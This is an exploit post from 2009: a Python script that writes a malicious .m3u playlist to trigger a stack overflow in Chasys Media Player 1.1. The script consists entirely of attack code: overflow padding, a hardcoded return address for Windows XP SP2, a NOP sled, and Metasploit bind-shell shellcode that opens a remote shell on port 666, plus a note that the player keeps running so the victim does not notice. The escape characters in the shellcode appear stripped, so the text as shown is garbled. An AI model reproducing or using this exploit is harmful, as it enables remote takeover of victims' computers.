chasysmp11m3u-overflow.txt
Posted on 19 March 2009
#!/usr/bin/python # Chasys Media Player 1.1 (.m3u) Stack Overflow Exploit # By: Encrypt3d.M!nd # # Credit flys to: zAx # # the good thing in this one that the program won't crash # when the playlist file imported,and will keep running. header = "#EXTM3U " junk = "x41"*260 eip = "x2bx2ax49x7e" #user32.dll win/xp sp2 nops = "x90" * 20 # win32_bind - EXITFUNC=seh LPORT=666 Size=344 Encoder=PexFnstenvSub http://metasploit.com shellcode = ( "x29xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x77" "x13x35x14x83xebxfcxe2xf4x8bx79xdex59x9fxeaxcaxeb" "x88x73xbex78x53x37xbex51x4bx98x49x11x0fx12xdax9f" "x38x0bxbex4bx57x12xdex5dxfcx27xbex15x99x22xf5x8d" "xdbx97xf5x60x70xd2xffx19x76xd1xdexe0x4cx47x11x3c" "x02xf6xbex4bx53x12xdex72xfcx1fx7ex9fx28x0fx34xff" "x74x3fxbex9dx1bx37x29x75xb4x22xeex70xfcx50x05x9f" "x37x1fxbex64x6bxbexbex54x7fx4dx5dx9ax39x1dxd9x44" "x88xc5x53x47x11x7bx06x26x1fx64x46x26x28x47xcaxc4" "x1fxd8xd8xe8x4cx43xcaxc2x28x9axd0x72xf6xfex3dx16" "x22x79x37xebxa7x7bxecx1dx82xbex62xebxa1x40x66x47" "x24x40x76x47x34x40xcaxc4x11x7bx37x8ex11x40xbcxf5" "xe2x7bx91x0ex07xd4x62xebxa1x79x25x45x22xecxe5x7c" "xd3xbex1bxfdx20xecxe3x47x22xecxe5x7cx92x5axb3x5d" "x20xecxe3x44x23x47x60xebxa7x80x5dxf3x0exd5x4cx43" "x88xc5x60xebxa7x75x5fx70x11x7bx56x79xfexf6x5fx44" "x2ex3axf9x9dx90x79x71x9dx95x22xf5xe7xddxedx77x39" "x89x51x19x87xfax69x0dxbfxdcxb8x5dx66x89xa0x23xeb" "x02x57xcaxc2x2cx44x67x45x26x42x5fx15x26x42x60x45" "x88xc3x5dxb9xaex16xfbx47x88xc5x5fxebx88x24xcaxc4" "xfcx44xc9x97xb3x77xcaxc2x25xecxe5x7cx87x99x31x4b" "x24xecxe3xebxa7x13x35x14") ex = header+junk+eip+nops+shellcode file=open("devil_inside.m3u","w") file.write(ex) file.close()
